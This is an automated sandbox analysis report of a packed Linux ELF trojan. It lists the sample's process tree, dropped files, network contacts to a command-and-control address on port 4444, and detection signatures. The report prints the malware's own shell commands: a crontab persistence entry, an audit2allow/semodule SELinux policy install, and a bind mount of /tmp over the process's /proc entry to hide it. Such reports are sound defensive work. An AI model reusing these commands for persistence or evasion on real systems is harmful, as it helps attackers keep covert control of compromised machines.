Edit tour

Linux Analysis Report
sBKWt6JPZa.elf

Overview

General Information

Sample name:	sBKWt6JPZa.elf renamed because original name is a hash value
Original sample name:	63945044a721e944cfad5d1223a109d4.elf
Analysis ID:	1534900
MD5:	63945044a721e944cfad5d1223a109d4
SHA1:	ad36f402f6ab4eadc0b7d2b264ea2e85f5ed295d
SHA256:	c58a9423d151407e4c432da5a28a4942a09030020fd89f1b7cc1f5bc569a2b60
Tags:	64elf
Infos:

Detection

Score:	72
Range:	0 - 100
Whitelisted:	false

Signatures

Multi AV Scanner detection for submitted file

Drops files in suspicious directories

Sample is packed with UPX

Sample tries to persist itself using /etc/profile

Sample tries to persist itself using System V runlevels

Sample tries to persist itself using cron

Sample tries to set files in /etc globally writable

Creates hidden files and/or directories

Creates hidden files without content (potentially used as a mutex)

Detected TCP or UDP traffic on non-standard ports

ELF contains segments with high entropy indicating compressed/encrypted content

Executes commands using a shell command-line interpreter

Executes the "systemctl" command used for controlling the systemd system and service manager

Reads the 'hosts' file potentially containing internal network hosts

Sample contains only a LOAD segment without any section mappings

Sample tries to set the executable flag

Sleeps for long times indicative of sandbox evasion

Uses the "uname" system call to query kernel version information (possible evasion)

Writes shell script file to disk with an unusual file extension

Writes shell script files to disk

Classification

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1534900
Start date and time:	2024-10-16 10:06:12 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 2s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultlinuxfilecookbook.jbs
Analysis system description:	Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:	default
Sample name:	sBKWt6JPZa.elf renamed because original name is a hash value
Original Sample Name:	63945044a721e944cfad5d1223a109d4.elf
Detection:	MAL
Classification:	mal72.spre.troj.evad.linELF@0/58@2/0

Warnings

VT rate limit hit for: sBKWt6JPZa.elf

Runtime Messages

Command:	/tmp/sBKWt6JPZa.elf
PID:	5404
Exit Code:	0
Exit Code Info:
Killed:	False
Standard Output:
Standard Error:

Process Tree

system is lnxubuntu20

sBKWt6JPZa.elf (PID: 5404, Parent: 5327, MD5: 63945044a721e944cfad5d1223a109d4) Arguments: /tmp/sBKWt6JPZa.elf

sBKWt6JPZa.elf New Fork (PID: 5409, Parent: 5404)

sBKWt6JPZa.elf (PID: 5409, Parent: 5404, MD5: 63945044a721e944cfad5d1223a109d4) Arguments: /tmp/sBKWt6JPZa.elf

sBKWt6JPZa.elf New Fork (PID: 5414, Parent: 5409)

bash (PID: 5414, Parent: 5409, MD5: 7063c3930affe123baecd3b340f1ad2c) Arguments: /bin/bash -c "cd /boot;systemctl daemon-reload;systemctl enable quotaon.service;systemctl start quotaon.service;journalctl -xe --no-pager"

bash New Fork (PID: 5415, Parent: 5414)

systemctl (PID: 5415, Parent: 5414, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl daemon-reload

bash New Fork (PID: 5419, Parent: 5414)

systemctl (PID: 5419, Parent: 5414, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl enable quotaon.service

bash New Fork (PID: 5423, Parent: 5414)

systemctl (PID: 5423, Parent: 5414, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl start quotaon.service

bash New Fork (PID: 5424, Parent: 5414)

journalctl (PID: 5424, Parent: 5414, MD5: bf3a987344f3bacafc44efd882abda8b) Arguments: journalctl -xe --no-pager

sBKWt6JPZa.elf New Fork (PID: 5425, Parent: 5409)

bash (PID: 5425, Parent: 5409, MD5: 7063c3930affe123baecd3b340f1ad2c) Arguments: /bin/bash -c "cd /boot;ausearch -c 'system.pub' --raw | audit2allow -M my-Systemmod;semodule -X 300 -i my-Systemmod.pp"

bash New Fork (PID: 5426, Parent: 5425)

bash New Fork (PID: 5427, Parent: 5425)

bash New Fork (PID: 5428, Parent: 5425)

sBKWt6JPZa.elf New Fork (PID: 5429, Parent: 5409)

bash (PID: 5429, Parent: 5409, MD5: 7063c3930affe123baecd3b340f1ad2c) Arguments: /bin/bash -c "echo \"*/1 * * * * root /.mod \" >> /etc/crontab"

sBKWt6JPZa.elf New Fork (PID: 5430, Parent: 5409)

update-rc.d (PID: 5430, Parent: 5409, MD5: 16a21f464119ea7fad1d3660de963637) Arguments: update-rc.d dns-udp4 defaults

update-rc.d New Fork (PID: 5431, Parent: 5430)

systemctl (PID: 5431, Parent: 5430, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl daemon-reload

sBKWt6JPZa.elf New Fork (PID: 5435, Parent: 5409)

mount (PID: 5435, Parent: 5409, MD5: 92b20aa8b155ecd3ba9414aa477ef565) Arguments: mount -o bind /tmp/ /proc/5409

sBKWt6JPZa.elf New Fork (PID: 5457, Parent: 5409)

service (PID: 5457, Parent: 5409, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: service cron start

service New Fork (PID: 5458, Parent: 5457)

basename (PID: 5458, Parent: 5457, MD5: 3283660e59f128df18bec9b96fbd4d41) Arguments: basename /usr/sbin/service

service New Fork (PID: 5461, Parent: 5457)

basename (PID: 5461, Parent: 5457, MD5: 3283660e59f128df18bec9b96fbd4d41) Arguments: basename /usr/sbin/service

service New Fork (PID: 5462, Parent: 5457)

systemctl (PID: 5462, Parent: 5457, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl --quiet is-active multi-user.target

service New Fork (PID: 5465, Parent: 5457)

service New Fork (PID: 5472, Parent: 5465)

systemctl (PID: 5472, Parent: 5465, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl list-unit-files --full --type=socket

service New Fork (PID: 5477, Parent: 5465)

sed (PID: 5477, Parent: 5465, MD5: 885062561f66aa1d4af4c54b9e7cc81a) Arguments: sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p

systemctl (PID: 5457, Parent: 5409, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl start cron.service

sBKWt6JPZa.elf New Fork (PID: 5489, Parent: 5409)

systemctl (PID: 5489, Parent: 5409, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl start crond.service

systemd New Fork (PID: 5417, Parent: 5416)

snapd-env-generator (PID: 5417, Parent: 5416, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator

systemd New Fork (PID: 5421, Parent: 5420)

snapd-env-generator (PID: 5421, Parent: 5420, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator

systemd New Fork (PID: 5433, Parent: 5432)

snapd-env-generator (PID: 5433, Parent: 5432, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator

udisksd New Fork (PID: 5444, Parent: 802)

dumpe2fs (PID: 5444, Parent: 802, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0

systemd New Fork (PID: 5478, Parent: 1)

cron (PID: 5478, Parent: 1, MD5: 2c82564ff5cc862c89392b061c7fbd59) Arguments: /usr/sbin/cron -f

cron New Fork (PID: 5538, Parent: 5478)

cron New Fork (PID: 5547, Parent: 5538)

sh (PID: 5547, Parent: 5538, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "/.mod "

sh New Fork (PID: 5548, Parent: 5547)

.mod (PID: 5548, Parent: 5547, MD5: 7063c3930affe123baecd3b340f1ad2c) Arguments: /.mod

.mod New Fork (PID: 5549, Parent: 5548)

libgdi.so.0.8.2 (PID: 5549, Parent: 5548, MD5: 63945044a721e944cfad5d1223a109d4) Arguments: /usr/lib/libgdi.so.0.8.2

libgdi.so.0.8.2 New Fork (PID: 5553, Parent: 5549)

libgdi.so.0.8.2 (PID: 5553, Parent: 5549, MD5: 63945044a721e944cfad5d1223a109d4) Arguments: /usr/lib/libgdi.so.0.8.2

systemd New Fork (PID: 5561, Parent: 1)

cron (PID: 5561, Parent: 1, MD5: 2c82564ff5cc862c89392b061c7fbd59) Arguments: /usr/sbin/cron -f

cron New Fork (PID: 5601, Parent: 5561)

cron New Fork (PID: 5611, Parent: 5601)

sh (PID: 5611, Parent: 5601, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "/.mod "

sh New Fork (PID: 5612, Parent: 5611)

.mod (PID: 5612, Parent: 5611, MD5: 7063c3930affe123baecd3b340f1ad2c) Arguments: /.mod

.mod New Fork (PID: 5617, Parent: 5612)

libgdi.so.0.8.2 (PID: 5617, Parent: 5612, MD5: 63945044a721e944cfad5d1223a109d4) Arguments: /usr/lib/libgdi.so.0.8.2

libgdi.so.0.8.2 New Fork (PID: 5621, Parent: 5617)

libgdi.so.0.8.2 (PID: 5621, Parent: 5617, MD5: 63945044a721e944cfad5d1223a109d4) Arguments: /usr/lib/libgdi.so.0.8.2

cron New Fork (PID: 5604, Parent: 5561)

cron New Fork (PID: 5610, Parent: 5604)

sh (PID: 5610, Parent: 5604, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c " [ -x /usr/lib/php/sessionclean ] && if [ ! -d /run/systemd/system ]; then /usr/lib/php/sessionclean; fi"

systemd New Fork (PID: 5625, Parent: 1)

cron (PID: 5625, Parent: 1, MD5: 2c82564ff5cc862c89392b061c7fbd59) Arguments: /usr/sbin/cron -f

cleanup

Yara Signatures

⊘No yara matches

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: sBKWt6JPZa.elf

ReversingLabs: Detection: 23%

Source: global traffic

TCP traffic: 192.168.2.13:50706 -> 27.30.77.93:4444

Source: /tmp/sBKWt6JPZa.elf (PID: 5409)

Reads hosts file: /etc/hosts

Jump to behavior

Source: unknown	TCP traffic detected without corresponding DNS query: 27.30.77.93
Source: unknown	TCP traffic detected without corresponding DNS query: 27.30.77.93
Source: unknown	TCP traffic detected without corresponding DNS query: 27.30.77.93
Source: unknown	TCP traffic detected without corresponding DNS query: 27.30.77.93
Source: unknown	TCP traffic detected without corresponding DNS query: 27.30.77.93
Source: unknown	TCP traffic detected without corresponding DNS query: 27.30.77.93
Source: unknown	TCP traffic detected without corresponding DNS query: 27.30.77.93
Source: unknown	TCP traffic detected without corresponding DNS query: 27.30.77.93
Source: unknown	TCP traffic detected without corresponding DNS query: 27.30.77.93
Source: unknown	TCP traffic detected without corresponding DNS query: 27.30.77.93
Source: unknown	TCP traffic detected without corresponding DNS query: 27.30.77.93
Source: unknown	TCP traffic detected without corresponding DNS query: 27.30.77.93
Source: unknown	TCP traffic detected without corresponding DNS query: 27.30.77.93
Source: unknown	TCP traffic detected without corresponding DNS query: 27.30.77.93
Source: unknown	TCP traffic detected without corresponding DNS query: 27.30.77.93
Source: unknown	TCP traffic detected without corresponding DNS query: 27.30.77.93
Source: unknown	TCP traffic detected without corresponding DNS query: 27.30.77.93
Source: unknown	TCP traffic detected without corresponding DNS query: 27.30.77.93
Source: unknown	TCP traffic detected without corresponding DNS query: 27.30.77.93
Source: unknown	TCP traffic detected without corresponding DNS query: 27.30.77.93
Source: unknown	TCP traffic detected without corresponding DNS query: 27.30.77.93
Source: unknown	TCP traffic detected without corresponding DNS query: 27.30.77.93
Source: unknown	TCP traffic detected without corresponding DNS query: 27.30.77.93
Source: unknown	TCP traffic detected without corresponding DNS query: 27.30.77.93
Source: unknown	TCP traffic detected without corresponding DNS query: 27.30.77.93
Source: unknown	TCP traffic detected without corresponding DNS query: 27.30.77.93
Source: unknown	TCP traffic detected without corresponding DNS query: 27.30.77.93
Source: unknown	TCP traffic detected without corresponding DNS query: 27.30.77.93
Source: unknown	TCP traffic detected without corresponding DNS query: 27.30.77.93
Source: unknown	TCP traffic detected without corresponding DNS query: 27.30.77.93
Source: unknown	TCP traffic detected without corresponding DNS query: 27.30.77.93
Source: unknown	TCP traffic detected without corresponding DNS query: 27.30.77.93
Source: unknown	TCP traffic detected without corresponding DNS query: 27.30.77.93
Source: unknown	TCP traffic detected without corresponding DNS query: 27.30.77.93
Source: unknown	TCP traffic detected without corresponding DNS query: 27.30.77.93
Source: unknown	TCP traffic detected without corresponding DNS query: 27.30.77.93
Source: unknown	TCP traffic detected without corresponding DNS query: 27.30.77.93
Source: unknown	TCP traffic detected without corresponding DNS query: 27.30.77.93
Source: unknown	TCP traffic detected without corresponding DNS query: 27.30.77.93
Source: unknown	TCP traffic detected without corresponding DNS query: 27.30.77.93
Source: unknown	TCP traffic detected without corresponding DNS query: 27.30.77.93
Source: unknown	TCP traffic detected without corresponding DNS query: 27.30.77.93
Source: unknown	TCP traffic detected without corresponding DNS query: 27.30.77.93
Source: unknown	TCP traffic detected without corresponding DNS query: 27.30.77.93
Source: unknown	TCP traffic detected without corresponding DNS query: 27.30.77.93
Source: unknown	TCP traffic detected without corresponding DNS query: 27.30.77.93
Source: unknown	TCP traffic detected without corresponding DNS query: 27.30.77.93
Source: unknown	TCP traffic detected without corresponding DNS query: 27.30.77.93
Source: unknown	TCP traffic detected without corresponding DNS query: 27.30.77.93
Source: unknown	TCP traffic detected without corresponding DNS query: 27.30.77.93

Source: global traffic

DNS traffic detected: DNS query: www.google.com

Source: sBKWt6JPZa.elf, 5404.1.00000000008ad000.0000000000935000.rw-.sdmp	String found in binary or memory: http://.css
Source: sBKWt6JPZa.elf, 5404.1.00000000008ad000.0000000000935000.rw-.sdmp	String found in binary or memory: http://.jpg
Source: sBKWt6JPZa.elf, 5404.1.00000000008ad000.0000000000935000.rw-.sdmp	String found in binary or memory: http://html4/loose.dtd
Source: sBKWt6JPZa.elf	String found in binary or memory: http://upx.sf.net

Source: LOAD without section mappings

Program segment: 0x400000

Source: classification engine

Classification label: mal72.spre.troj.evad.linELF@0/58@2/0

Data Obfuscation

Sample is packed with UPX

Source: initial sample	String containing UPX found: $Info: This file is packed with the UPX executable packer http://upx.sf.net $
Source: initial sample	String containing UPX found: $Info: This file is packed with the UPX executable packer http://upx.sf.net $
Source: initial sample	String containing UPX found: $Id: UPX 3.94 Copyright (C) 1996-2017 the UPX Team. All Rights Reserved. $

Persistence and Installation Behavior

Sample tries to persist itself using /etc/profile

Source: /tmp/sBKWt6JPZa.elf (PID: 5409)	File: /etc/profile.d/bash.cfg.sh			Jump to behavior
Source: /tmp/sBKWt6JPZa.elf (PID: 5409)	File: /etc/profile.d/gateway.sh			Jump to behavior

Sample tries to persist itself using System V runlevels

Source: /usr/sbin/update-rc.d (PID: 5430)	File: /etc/rc2.d/S01dns-udp4 -> ../init.d/dns-udp4	Jump to behavior
Source: /usr/sbin/update-rc.d (PID: 5430)	File: /etc/rc3.d/S01dns-udp4 -> ../init.d/dns-udp4	Jump to behavior
Source: /usr/sbin/update-rc.d (PID: 5430)	File: /etc/rc4.d/S01dns-udp4 -> ../init.d/dns-udp4	Jump to behavior
Source: /usr/sbin/update-rc.d (PID: 5430)	File: /etc/rc5.d/S01dns-udp4 -> ../init.d/dns-udp4	Jump to behavior

Sample tries to persist itself using cron

Source: /bin/bash (PID: 5429)

File: /etc/crontab

Jump to behavior

Sample tries to set files in /etc globally writable

Source: /tmp/sBKWt6JPZa.elf (PID: 5409)

File: /etc/profile.d/bash.cfg (bits: - usr: rx grp: rx all: rwx)

Jump to behavior

Source: /tmp/sBKWt6JPZa.elf (PID: 5409)	File: /etc/.ffff4444	Jump to behavior
Source: /tmp/sBKWt6JPZa.elf (PID: 5409)	File: /etc/.cfg	Jump to behavior
Source: /tmp/sBKWt6JPZa.elf (PID: 5409)	File: /etc/.cfg	Jump to behavior
Source: /tmp/sBKWt6JPZa.elf (PID: 5409)	File: /.mod	Jump to behavior
Source: /.mod (PID: 5548)	Directory: /.mod	Jump to behavior
Source: /usr/lib/libgdi.so.0.8.2 (PID: 5553)	File: /etc/.ffff4444	Jump to behavior
Source: /usr/lib/libgdi.so.0.8.2 (PID: 5553)	File: /etc/.cfg	Jump to behavior
Source: /.mod (PID: 5612)	Directory: /.mod	Jump to behavior
Source: /usr/lib/libgdi.so.0.8.2 (PID: 5621)	File: /etc/.ffff4444	Jump to behavior
Source: /usr/lib/libgdi.so.0.8.2 (PID: 5621)	File: /etc/.cfg	Jump to behavior

Source: /usr/lib/libgdi.so.0.8.2 (PID: 5621)

Empty hidden file: /etc/.ffff4444

Jump to behavior

Source: /tmp/sBKWt6JPZa.elf (PID: 5414)	Shell command executed: /bin/bash -c "cd /boot;systemctl daemon-reload;systemctl enable quotaon.service;systemctl start quotaon.service;journalctl -xe --no-pager"	Jump to behavior
Source: /tmp/sBKWt6JPZa.elf (PID: 5425)	Shell command executed: /bin/bash -c "cd /boot;ausearch -c 'system.pub' --raw \| audit2allow -M my-Systemmod;semodule -X 300 -i my-Systemmod.pp"	Jump to behavior
Source: /tmp/sBKWt6JPZa.elf (PID: 5429)	Shell command executed: /bin/bash -c "echo \"/1 * * * root /.mod \" >> /etc/crontab"	Jump to behavior
Source: /usr/sbin/cron (PID: 5547)	Shell command executed: /bin/sh -c "/.mod "	Jump to behavior
Source: /usr/sbin/cron (PID: 5611)	Shell command executed: /bin/sh -c "/.mod "	Jump to behavior
Source: /usr/sbin/cron (PID: 5610)	Shell command executed: /bin/sh -c " [ -x /usr/lib/php/sessionclean ] && if [ ! -d /run/systemd/system ]; then /usr/lib/php/sessionclean; fi"	Jump to behavior

Source: /bin/bash (PID: 5415)	Systemctl executable: /usr/bin/systemctl -> systemctl daemon-reload	Jump to behavior
Source: /bin/bash (PID: 5419)	Systemctl executable: /usr/bin/systemctl -> systemctl enable quotaon.service	Jump to behavior
Source: /bin/bash (PID: 5423)	Systemctl executable: /usr/bin/systemctl -> systemctl start quotaon.service	Jump to behavior
Source: /usr/sbin/update-rc.d (PID: 5431)	Systemctl executable: /usr/bin/systemctl -> systemctl daemon-reload	Jump to behavior
Source: /usr/sbin/service (PID: 5457)	Systemctl executable: /usr/bin/systemctl -> systemctl start cron.service	Jump to behavior
Source: /usr/sbin/service (PID: 5462)	Systemctl executable: /usr/bin/systemctl -> systemctl --quiet is-active multi-user.target	Jump to behavior
Source: /usr/sbin/service (PID: 5472)	Systemctl executable: /usr/bin/systemctl -> systemctl list-unit-files --full --type=socket	Jump to behavior
Source: /tmp/sBKWt6JPZa.elf (PID: 5489)	Systemctl executable: /usr/bin/systemctl -> systemctl start crond.service	Jump to behavior

Source: /tmp/sBKWt6JPZa.elf (PID: 5409)	File: /boot/system.pub (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /tmp/sBKWt6JPZa.elf (PID: 5409)	File: /etc/profile.d/bash.cfg (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /tmp/sBKWt6JPZa.elf (PID: 5409)	File: /usr/lib/libgdi.so.0.8.2 (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /tmp/sBKWt6JPZa.elf (PID: 5409)	File: /usr/lib/system.mark (bits: - usr: rx grp: rx all: rwx)	Jump to behavior

Source: /tmp/sBKWt6JPZa.elf (PID: 5409)	Writes shell script file to disk with an unusual file extension: /.mod	Jump to dropped file
Source: /tmp/sBKWt6JPZa.elf (PID: 5409)	Writes shell script file to disk with an unusual file extension: /etc/init.d/acpid	Jump to dropped file
Source: /tmp/sBKWt6JPZa.elf (PID: 5409)	Writes shell script file to disk with an unusual file extension: /etc/init.d/alsa-utils	Jump to dropped file
Source: /tmp/sBKWt6JPZa.elf (PID: 5409)	Writes shell script file to disk with an unusual file extension: /etc/init.d/anacron	Jump to dropped file
Source: /tmp/sBKWt6JPZa.elf (PID: 5409)	Writes shell script file to disk with an unusual file extension: /etc/init.d/apparmor	Jump to dropped file
Source: /tmp/sBKWt6JPZa.elf (PID: 5409)	Writes shell script file to disk with an unusual file extension: /etc/init.d/apport	Jump to dropped file
Source: /tmp/sBKWt6JPZa.elf (PID: 5409)	Writes shell script file to disk with an unusual file extension: /etc/init.d/avahi-daemon	Jump to dropped file
Source: /tmp/sBKWt6JPZa.elf (PID: 5409)	Writes shell script file to disk with an unusual file extension: /etc/init.d/binfmt-support	Jump to dropped file
Source: /tmp/sBKWt6JPZa.elf (PID: 5409)	Writes shell script file to disk with an unusual file extension: /etc/init.d/bluetooth	Jump to dropped file
Source: /tmp/sBKWt6JPZa.elf (PID: 5409)	Writes shell script file to disk with an unusual file extension: /etc/init.d/cron	Jump to dropped file
Source: /tmp/sBKWt6JPZa.elf (PID: 5409)	Writes shell script file to disk with an unusual file extension: /etc/init.d/cryptdisks	Jump to dropped file
Source: /tmp/sBKWt6JPZa.elf (PID: 5409)	Writes shell script file to disk with an unusual file extension: /etc/init.d/cryptdisks-early	Jump to dropped file
Source: /tmp/sBKWt6JPZa.elf (PID: 5409)	Writes shell script file to disk with an unusual file extension: /etc/init.d/cups	Jump to dropped file
Source: /tmp/sBKWt6JPZa.elf (PID: 5409)	Writes shell script file to disk with an unusual file extension: /etc/init.d/cups-browsed	Jump to dropped file
Source: /tmp/sBKWt6JPZa.elf (PID: 5409)	Writes shell script file to disk with an unusual file extension: /etc/init.d/dbus	Jump to dropped file
Source: /tmp/sBKWt6JPZa.elf (PID: 5409)	Writes shell script file to disk with an unusual file extension: /etc/init.d/gdm3	Jump to dropped file
Source: /tmp/sBKWt6JPZa.elf (PID: 5409)	Writes shell script file to disk with an unusual file extension: /etc/init.d/hddtemp	Jump to dropped file
Source: /tmp/sBKWt6JPZa.elf (PID: 5409)	Writes shell script file to disk with an unusual file extension: /etc/init.d/irqbalance	Jump to dropped file
Source: /tmp/sBKWt6JPZa.elf (PID: 5409)	Writes shell script file to disk with an unusual file extension: /etc/init.d/iscsid	Jump to dropped file
Source: /tmp/sBKWt6JPZa.elf (PID: 5409)	Writes shell script file to disk with an unusual file extension: /etc/init.d/kmod	Jump to dropped file
Source: /tmp/sBKWt6JPZa.elf (PID: 5409)	Writes shell script file to disk with an unusual file extension: /etc/init.d/lightdm	Jump to dropped file
Source: /tmp/sBKWt6JPZa.elf (PID: 5409)	Writes shell script file to disk with an unusual file extension: /etc/init.d/lm-sensors	Jump to dropped file
Source: /tmp/sBKWt6JPZa.elf (PID: 5409)	Writes shell script file to disk with an unusual file extension: /etc/init.d/lvm2-lvmpolld	Jump to dropped file
Source: /tmp/sBKWt6JPZa.elf (PID: 5409)	Writes shell script file to disk with an unusual file extension: /etc/init.d/mono-xsp4	Jump to dropped file
Source: /tmp/sBKWt6JPZa.elf (PID: 5409)	Writes shell script file to disk with an unusual file extension: /etc/init.d/multipath-tools	Jump to dropped file
Source: /tmp/sBKWt6JPZa.elf (PID: 5409)	Writes shell script file to disk with an unusual file extension: /etc/init.d/open-iscsi	Jump to dropped file
Source: /tmp/sBKWt6JPZa.elf (PID: 5409)	Writes shell script file to disk with an unusual file extension: /etc/init.d/open-vm-tools	Jump to dropped file
Source: /tmp/sBKWt6JPZa.elf (PID: 5409)	Writes shell script file to disk with an unusual file extension: /etc/init.d/plymouth	Jump to dropped file
Source: /tmp/sBKWt6JPZa.elf (PID: 5409)	Writes shell script file to disk with an unusual file extension: /etc/init.d/plymouth-log	Jump to dropped file
Source: /tmp/sBKWt6JPZa.elf (PID: 5409)	Writes shell script file to disk with an unusual file extension: /etc/init.d/procps	Jump to dropped file
Source: /tmp/sBKWt6JPZa.elf (PID: 5409)	Writes shell script file to disk with an unusual file extension: /etc/init.d/rsync	Jump to dropped file
Source: /tmp/sBKWt6JPZa.elf (PID: 5409)	Writes shell script file to disk with an unusual file extension: /etc/init.d/rsyslog	Jump to dropped file
Source: /tmp/sBKWt6JPZa.elf (PID: 5409)	Writes shell script file to disk with an unusual file extension: /etc/init.d/saned	Jump to dropped file
Source: /tmp/sBKWt6JPZa.elf (PID: 5409)	Writes shell script file to disk with an unusual file extension: /etc/init.d/screen-cleanup	Jump to dropped file
Source: /tmp/sBKWt6JPZa.elf (PID: 5409)	Writes shell script file to disk with an unusual file extension: /etc/init.d/spice-vdagent	Jump to dropped file
Source: /tmp/sBKWt6JPZa.elf (PID: 5409)	Writes shell script file to disk with an unusual file extension: /etc/init.d/ssh	Jump to dropped file
Source: /tmp/sBKWt6JPZa.elf (PID: 5409)	Writes shell script file to disk with an unusual file extension: /etc/init.d/udev	Jump to dropped file
Source: /tmp/sBKWt6JPZa.elf (PID: 5409)	Writes shell script file to disk with an unusual file extension: /etc/init.d/ufw	Jump to dropped file
Source: /tmp/sBKWt6JPZa.elf (PID: 5409)	Writes shell script file to disk with an unusual file extension: /etc/init.d/unattended-upgrades	Jump to dropped file
Source: /tmp/sBKWt6JPZa.elf (PID: 5409)	Writes shell script file to disk with an unusual file extension: /etc/init.d/uuidd	Jump to dropped file
Source: /tmp/sBKWt6JPZa.elf (PID: 5409)	Writes shell script file to disk with an unusual file extension: /etc/init.d/x11-common	Jump to dropped file
Source: /tmp/sBKWt6JPZa.elf (PID: 5409)	Writes shell script file to disk with an unusual file extension: /etc/init.d/dns-udp4	Jump to dropped file

Source: /tmp/sBKWt6JPZa.elf (PID: 5409)	Shell script file created: /etc/profile.d/bash.cfg.sh	Jump to dropped file
Source: /tmp/sBKWt6JPZa.elf (PID: 5409)	Shell script file created: /etc/init.d/console-setup.sh	Jump to dropped file
Source: /tmp/sBKWt6JPZa.elf (PID: 5409)	Shell script file created: /etc/init.d/hwclock.sh	Jump to dropped file
Source: /tmp/sBKWt6JPZa.elf (PID: 5409)	Shell script file created: /etc/init.d/keyboard-setup.sh	Jump to dropped file
Source: /tmp/sBKWt6JPZa.elf (PID: 5409)	Shell script file created: /etc/profile.d/gateway.sh	Jump to dropped file

Source: /usr/sbin/service (PID: 5477)

Sed executable: /usr/bin/sed -> sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p

Jump to behavior

Hooking and other Techniques for Hiding and Protection

Drops files in suspicious directories

Source: /tmp/sBKWt6JPZa.elf (PID: 5409)	File: /etc/init.d/acpid	Jump to dropped file
Source: /tmp/sBKWt6JPZa.elf (PID: 5409)	File: /etc/init.d/alsa-utils	Jump to dropped file
Source: /tmp/sBKWt6JPZa.elf (PID: 5409)	File: /etc/init.d/anacron	Jump to dropped file
Source: /tmp/sBKWt6JPZa.elf (PID: 5409)	File: /etc/init.d/apparmor	Jump to dropped file
Source: /tmp/sBKWt6JPZa.elf (PID: 5409)	File: /etc/init.d/apport	Jump to dropped file
Source: /tmp/sBKWt6JPZa.elf (PID: 5409)	File: /etc/init.d/avahi-daemon	Jump to dropped file
Source: /tmp/sBKWt6JPZa.elf (PID: 5409)	File: /etc/init.d/binfmt-support	Jump to dropped file
Source: /tmp/sBKWt6JPZa.elf (PID: 5409)	File: /etc/init.d/bluetooth	Jump to dropped file
Source: /tmp/sBKWt6JPZa.elf (PID: 5409)	File: /etc/init.d/console-setup.sh	Jump to dropped file
Source: /tmp/sBKWt6JPZa.elf (PID: 5409)	File: /etc/init.d/cron	Jump to dropped file
Source: /tmp/sBKWt6JPZa.elf (PID: 5409)	File: /etc/init.d/cryptdisks	Jump to dropped file
Source: /tmp/sBKWt6JPZa.elf (PID: 5409)	File: /etc/init.d/cryptdisks-early	Jump to dropped file
Source: /tmp/sBKWt6JPZa.elf (PID: 5409)	File: /etc/init.d/cups	Jump to dropped file
Source: /tmp/sBKWt6JPZa.elf (PID: 5409)	File: /etc/init.d/cups-browsed	Jump to dropped file
Source: /tmp/sBKWt6JPZa.elf (PID: 5409)	File: /etc/init.d/dbus	Jump to dropped file
Source: /tmp/sBKWt6JPZa.elf (PID: 5409)	File: /etc/init.d/gdm3	Jump to dropped file
Source: /tmp/sBKWt6JPZa.elf (PID: 5409)	File: /etc/init.d/hddtemp	Jump to dropped file
Source: /tmp/sBKWt6JPZa.elf (PID: 5409)	File: /etc/init.d/hwclock.sh	Jump to dropped file
Source: /tmp/sBKWt6JPZa.elf (PID: 5409)	File: /etc/init.d/irqbalance	Jump to dropped file
Source: /tmp/sBKWt6JPZa.elf (PID: 5409)	File: /etc/init.d/iscsid	Jump to dropped file
Source: /tmp/sBKWt6JPZa.elf (PID: 5409)	File: /etc/init.d/keyboard-setup.sh	Jump to dropped file
Source: /tmp/sBKWt6JPZa.elf (PID: 5409)	File: /etc/init.d/kmod	Jump to dropped file
Source: /tmp/sBKWt6JPZa.elf (PID: 5409)	File: /etc/init.d/lightdm	Jump to dropped file
Source: /tmp/sBKWt6JPZa.elf (PID: 5409)	File: /etc/init.d/lm-sensors	Jump to dropped file
Source: /tmp/sBKWt6JPZa.elf (PID: 5409)	File: /etc/init.d/lvm2-lvmpolld	Jump to dropped file
Source: /tmp/sBKWt6JPZa.elf (PID: 5409)	File: /etc/init.d/mono-xsp4	Jump to dropped file
Source: /tmp/sBKWt6JPZa.elf (PID: 5409)	File: /etc/init.d/multipath-tools	Jump to dropped file
Source: /tmp/sBKWt6JPZa.elf (PID: 5409)	File: /etc/init.d/open-iscsi	Jump to dropped file
Source: /tmp/sBKWt6JPZa.elf (PID: 5409)	File: /etc/init.d/open-vm-tools	Jump to dropped file
Source: /tmp/sBKWt6JPZa.elf (PID: 5409)	File: /etc/init.d/plymouth	Jump to dropped file
Source: /tmp/sBKWt6JPZa.elf (PID: 5409)	File: /etc/init.d/plymouth-log	Jump to dropped file
Source: /tmp/sBKWt6JPZa.elf (PID: 5409)	File: /etc/init.d/procps	Jump to dropped file
Source: /tmp/sBKWt6JPZa.elf (PID: 5409)	File: /etc/init.d/rsync	Jump to dropped file
Source: /tmp/sBKWt6JPZa.elf (PID: 5409)	File: /etc/init.d/rsyslog	Jump to dropped file
